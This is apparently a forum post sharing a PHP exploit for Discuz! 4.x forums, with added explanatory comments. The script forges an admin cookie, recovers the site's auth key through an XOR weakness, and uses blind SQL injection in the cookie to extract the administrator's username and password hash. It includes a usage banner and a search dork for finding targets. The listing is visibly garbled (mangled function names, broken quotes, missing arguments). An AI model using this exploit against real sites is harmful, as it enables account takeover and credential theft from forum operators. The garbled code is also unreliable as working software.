I posted an exp for the Discuz! 5.0.0 GBK version a while ago.
I saw the 4.x one on Cn.tink today; I went to the original site, then found a Discuz! 4.1.0 and tested it briefly — it worked, see the screenshot below. Many friends did not know how to use the Discuz! 5.0.0 GBK exp; I explained at the time, but some still did not understand, so this time I have included a screenshot, and anyone who does not know how to use it should understand after looking at it.
Figure:
The code is as follows:
<?php
// Banner, usage check and runtime settings.  This copy of the listing is
// extraction-garbled (case-mangled names, "$i + +", unbalanced quotes), so
// the comments describe the apparent intent rather than a verified run.
Print_r ('
---------------------------------------------------------------------------
discuz! 4.x SQL injection/admin credentials disclosure exploit
by Rgod rgod@autistici.org
site:http://retrogod.altervista.org
Dork: "Powered by discuz!
---------------------------------------------------------------------------
');
// Fewer than three CLI arguments (script, host, path): print usage and stop.
if ($ARGC <3) {
Print_r ('
---------------------------------------------------------------------------
usage:php '. $argv [0]. ' Host path OPTIONS
Host:target Server (Ip/hostname)
Path:path to Discuz
Options:
-p[port]: Specify a port other than 80
-p[ip:port]: Specify a proxy
Example:
php '. $argv [0]. ' localhost/discuz/-p1.1.1.1:80
php '. $argv [0]. ' localhost/discuz/-p81
---------------------------------------------------------------------------
');
Die
}
// Silence all PHP errors (this also hides the notices for variables the
// script never assigns, such as $data), remove the execution time limit and
// give socket operations a 5-second timeout.
error_reporting (0);
Ini_set ("Max_execution_time", 0);
Ini_set ("Default_socket_timeout", 5);
// Debugging helper: renders $string as a hex dump.  Builds one line of
// two-digit hex codes ($exa) and one line of printable characters ($result,
// with bytes <= 32 or > 126 shown as '.'), breaking both every 15 bytes, and
// returns hex, CRLF, printable.  Not called anywhere in this listing.
function Quick_dump ($string)
{
$result = '; $exa = '; $cont = 0;
// Walk the input one byte at a time.
For ($i =0 $i <=strlen ($string)-1; $i + +)
{
// Non-printable bytes become '.' in the text column.
if ((Ord ($string [$i]) <= 32) | (Ord ($string [$i]) > 126))
{$result. = ".";}
Else
{$result. = "". $string [$i];}
// Zero-pad single-digit hex values so every byte takes two columns.
if (strlen (Dechex (Ord ($string [$i])) ==2)
{$exa. = "". Dechex (Ord ($string [$i]));}
Else
{$exa. = "0". Dechex (Ord ($string [$i]);}
// Wrap both columns after 15 bytes.
$cont ++;if ($cont ==15) {$cont =0; $result. = "\ r \ n"; $exa. = "\ r \ n";}
}
return $exa. " \ r \ n ". $result;
}
// Shape a proxy argument must have: dotted-quad followed by ':port'.  Only
// the digit pattern is checked; octet and port ranges are not validated.
$proxy _regex = ' (\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';
// Sends one raw HTTP request ($packet) either directly to $host:$port or
// through the proxy in $proxy, and leaves the complete response in the
// global $html.  Communicates through globals instead of parameters and a
// return value; each call overwrites $html.  A failed connection prints a
// message and terminates the script.
function Sendpacketii ($packet)
{
Global $proxy, $host, $port, $html, $proxy _regex;
// No proxy configured: connect straight to the host.
if ($proxy = = ") {
$ock =fsockopen (gethostbyname ($host), $port);
if (! $ock) {
Echo ' No response from '. $host. ': $port; Die
}
}
else {
// The proxy string must match $proxy_regex (ip:port) before it is used.
$c = Preg_match ($proxy _regex, $proxy);
if (! $c) {
Echo ' Not a valid proxy ... ';d ie;
}
$parts =explode (': ', $proxy);
echo "Connecting to". $parts [0]. ":". $parts [1]. "Proxy...\r\n";
$ock =fsockopen ($parts [0], $parts [1]);
if (! $ock) {
Echo ' No response from proxy ... ';d ie;
}
}
Fputs ($ock, $packet);
if ($proxy = = ") {
// Direct connection: read line by line until the peer closes.
$html = ';
while (!feof ($ock)) {
$html. =fgets ($ock);
}
}
else {
// Proxy: read byte by byte.  The two conditions are joined with 'or', so
// the loop only ends once EOF is reached *and* a CRLFCRLF header
// terminator has been seen in $html; as written, a response that never
// contains that sequence keeps calling fread() after EOF.
$html = ';
while (!feof ($ock)) or (!eregi (Chr (0x0d). chr (0x0a). chr (0x0d). Chr (0x0a), $html))) {
$html. =fread ($ock, 1);
}
}
Fclose ($ock);
}
// Command-line handling: positional host and path, then optional flags.
$host = $argv [1];
$path = $ARGV [2];
$port = 80;
$proxy = "";
// Each extra argument is classified by its first two characters.  In this
// copy both comparisons read "-P"; the usage text says -p is the port and
// -P the proxy, so the case distinction was presumably lost in extraction.
for ($i =3; $i < $ARGC; $i + +) {
$temp = $argv [$i][0]. $argv [$i][1];
if ($temp = = "-P")
{
$port =str_replace ("P", "", $argv [$i]);
}
if ($temp = = "-P")
{
$proxy =str_replace ("P", "", $argv [$i]);
}
}
// The path must start and end with '/'.
if ($path [0]<> '/') or ($path [strlen ($path) -1]<> ')] {echo ' Error ... check the path! '; die;}
// Request target: a bare path for a direct connection, an absolute URL when
// the request goes through a proxy.
if ($proxy = =) {$p = $path;} else {$p = ' http://'. $host. ': $port. $path;}
echo "Please wait...\n";
// From global.func.php
// Discuz's cookie encoder, copied from the target's global.func.php.
// ENCODE: XOR the input with $key in 32-byte chunks, base64 the result and
// strip the '=' padding.  DECODE: base64-decode, then XOR the same way.
// When $key is empty the global 'discuz_auth_key' is used.
// XOR against a fixed repeating key is not encryption: a single known
// plaintext reveals the key byte by byte, which is exactly what the key
// recovery loop later in this script relies on.  Cookie data that carries
// authority needs an authenticated construction (a MAC over its contents),
// not a reversible XOR.
function Authcode ($string, $operation, $key = ') {
$key = $key? $key: $GLOBALS [' Discuz_auth_key '];
$coded = ';
$keylength = 32;
$string = $operation = = ' DECODE '? Base64_decode ($string): $string;
// The substr length argument is missing in this copy; presumably it was
// $keylength (32) so that each chunk lines up with the key.
for ($i = 0; $i < strlen ($string); $i + + 32) {
$coded. = substr ($string, $i,) ^ $key;
}
$coded = $operation = = ' ENCODE '? Str_replace (' = ', ', Base64_encode ($coded)): $coded;
return $coded;
}
// Stolen from install.php
// Returns a pseudo-random string of $length characters drawn from $chars
// (copied from Discuz's install.php).  Seeding mt_rand() from microtime()
// makes the output guessable; here it only supplies a throwaway guess for
// the auth key, so that weakness does not matter to this script.
function Random ($length) {
$hash = ';
// The alphabet appears twice as lowercase in this copy; the original
// presumably distinguished upper and lower case.
$chars = ' abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwxyz ';
$max = strlen ($chars)-1;
Mt_srand (Double) microtime () * 1000000);
for ($i = 0; $i < $length; $i + +) {
$hash. = $chars [Mt_rand (0, $max)];
}
return $hash;
}
// Phase 1: obtain the server's view of a forged admin cookie.  The cdb_auth
// cookie is encoded under a random guessed key; the server decodes it with
// its real key and, per the author's note below, the decoded bytes
// apparently surface in an echoed SQL statement, from which three quoted
// values are cut out.  The fixed User-Agent matters because, per the note,
// it feeds the key derivation.  Every request hits admincp.php with
// adminid=1 and a googlebot User-Agent, which is a usable access-log signal.
$agent = "googlebot/2.1";
// Errors sql ... you need auth key,
// It's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask;)
// $tt holds all 256 byte values so that every key position is exercised.
$tt = "" For ($i =0 $i <=255; $i + +) {$tt. =CHR ($i);}
// Retry with a fresh random key until the extracted string has the
// expected length (270) and contains no '='.
while (1)
{
$discuz _auth_key=random (32);
$packet = "Get". $p. " Admincp.php?action=recyclebin http/1.0\r\n ";
$packet. = "client-ip:999.999.999.999\r\n";//spoof
$packet. = "User-agent: $agent \ r \ n";
$packet. = "Host:". $host. " \ r \ n ";
$packet. = "cookie:adminid=1; cdb_sid=1; Cdb_auth= ". Authcode (" suntzu\tsuntzu\t ". $tt," ENCODE ")."; \ r\n ";
$packet. = "accept:text/plain\r\n";
$packet. = "connection:close\r\n\r\n";
// $data is never assigned in this listing; error_reporting(0) hides that.
$packet. = $data;
Sendpacketii ($packet);
$html =html_entity_decode ($html);
$html =str_replace ("<br/>", "", $html);
// Cut the three quoted values out of the echoed query text.
$t =explode ("and m.password= '", $html);
$t 2=explode ("'", $t [1]);
$pwd _f= $t 2[0];
$t =explode ("and m.secques= '", $html);
$t 2=explode ("' \ n", $t [1]);
$secques _f= $t 2[0];
$t =explode ("and m.uid= '", $html);
$t 2=explode ("' \x0d", $t [1]);
$uid _f= $t 2[0];
$my _string= $pwd _f. " \ t ". $secques _f." \ t ". $uid _f;
if ((strlen ($my _string) ==270) and (!eregi ("=", $my _string)) {
Break
}
}
// Phase 2: recover the 32-byte auth key.  $temp is the forged cookie value
// again ($discuz_auth_key still holds the last random key) and $my_string
// is what the server made of it.  For each key position $j, each candidate
// byte is placed at position $j of a trial key (behind $j filler 'a's), the
// cookie is decoded with that trial key, and a candidate whose byte $j
// matches the server's byte $j is appended to $key.  This works only
// because Authcode() is a repeating XOR; it is the concrete cost of using
// an unauthenticated, reversible cookie encoding.
$temp = Authcode ("suntzu\tsuntzu\t". $tt, "ENCODE");
// Calculating key ...
$key = "";
For ($j =0 $j <32; $j + +) {
For ($i =0 $i <255; $i + +) {
$AA = "";
// $j filler bytes so that chr($i) lands at key position $j.
if ($j <>0) {
for ($k =1; $k <= $j; $k + +) {
$aa. = "a";
}
}
$GLOBALS [' Discuz_auth_key ']= $aa. chr ($i);
$t = Authcode ($temp, "DECODE");
if ($t [$j]== $my _string[$j]) {
$key. =CHR ($i);
}
}
}
echo "AUTH KEY->". $key. " \ r \ n ";
// From here on Authcode() encodes with the recovered key.
$GLOBALS [' Discuz_auth_key ']= $key;
// Phase 3: read the admin password hash one character at a time through a
// boolean-based blind SQL injection carried in the cdb_auth cookie (now
// encoded under the recovered key, so the application presumably accepts
// it as an admin session).  Each request asks whether character $j of
// m.password equals $i; a response containing 'action=groupexpiry' means
// yes.  Candidates are NUL (terminator), digits and a-f, since the value is
// expected to be an MD5 hex digest.
// Defensively: this is one request per candidate character against
// admincp.php from a session that never logged in, a pattern an access-log
// or WAF rule can flag, and the root cause is cookie-derived data reaching
// a query without parameterisation.
echo "PWD hash (MD5)->";
$chars [0]=0;//null
$chars =array_merge ($chars, Range (48,57)); // Numbers
$chars =array_merge ($chars, Range (97,102));//a-f Letters
$j =1; $password = "";
// Stop once the NUL terminator has been recovered.
while (!strstr ($password, Chr (0)))
{
For ($i =0 $i <=255; $i + +)
{
if (In_array ($i, $chars))
{
// can use every char because of base64_decode () ... so this bypass magic quotes ...
// And some help by extract () to overwrite VARs
$sql = "999999"/**/union/**/select/**/1,1,1,1,1,1,1,1,1,1,1,1, (IF (ASCII (SUBSTRING (M.password, $j, 1) = ". $i."), 1,0 )), 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/cdb_sessions/**/s,/**/cdb_members/**/m/* */where/**/adminid=1/**/limit/**/1/* ";
$packet = "Get". $p. " admincp.php?action=recyclebin& http/1.0\r\n ";
$packet. = "User-agent: $agent \ r \ n";
$packet. = "client-ip:1.2.3.4\r\n";
$packet. = "Host:". $host. " \ r \ n ";
$packet. = "cookie:adminid=1; cdb_sid=1; Cdb_auth= ". Authcode (" suntzu\tsuntzu\t ". $sql," ENCODE ")."; \ r\n ";
$packet. = "accept:text/plain\r\n";
$packet. = "connection:close\r\n\r\n";
// $data is never assigned in this listing.
$packet. = $data;
Sendpacketii ($packet);
// Marker present: the IF() was true, so this is character $j.
if (eregi ("Action=groupexpiry", $html)) {
$password. =CHR ($i), Echo chr ($i), sleep (1), break;
}
}
if ($i ==255) {
Die ("\nexploit failed ...");
}
}
$j + +;
}
// Phase 4: same character-by-character extraction for m.username, this
// time trying every byte value 0..255.  Leaves the same request pattern in
// the server logs as the password phase.
echo "\nadmin user->";
$j =1; $admin = "";
// Stop once the NUL terminator has been recovered.
while (!strstr ($admin, Chr (0)))
{
For ($i =0 $i <=255; $i + +)
{
$sql = "999999"/**/union/**/select/**/1,1,1,1,1,1,1,1,1,1,1,1, (IF (ASCII (SUBSTRING (M.username, $j, 1) = ". $i."), 1,0 )), 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/cdb_sessions/**/s,/**/cdb_members/**/m/* */where/**/adminid=1/**/limit/**/1/* ";
$packet = "Get". $p. " admincp.php?action=recyclebin& http/1.0\r\n ";
$packet. = "User-agent: $agent \ r \ n";
$packet. = "client-ip:1.2.3.4\r\n";
$packet. = "Host:". $host. " \ r \ n ";
$packet. = "cookie:adminid=1; cdb_sid=1; Cdb_auth= ". Authcode (" suntzu\tsuntzu\t ". $sql," ENCODE ")."; \ r\n ";
$packet. = "accept:text/plain\r\n";
$packet. = "connection:close\r\n\r\n";
// $data is never assigned in this listing.
$packet. = $data;
Sendpacketii ($packet);
// Marker present: the IF() was true, so this is character $j.
if (eregi ("Action=groupexpiry", $html)) {
$admin. =CHR ($i), Echo chr ($i), sleep (1), break;
}
if ($i ==255) {die ("\nexploit failed ...");}
}
$j + +;
}
// True when the trimmed value begins with 32 hex characters.  The pattern
// has no end anchor, so longer strings pass too; ereg() no longer exists in
// PHP 7.
function Is_hash ($hash)
{
if (Ereg ("^[a-f0-9]{32}", Trim ($hash)) {return true;}
else {return false;}
}
// Final verdict: success is judged only by whether $password looks like an
// MD5 hex digest.
if (Is_hash ($password)) {
echo "Exploit succeeded ...";
}
else {
echo "Exploit failed ...";
}
?>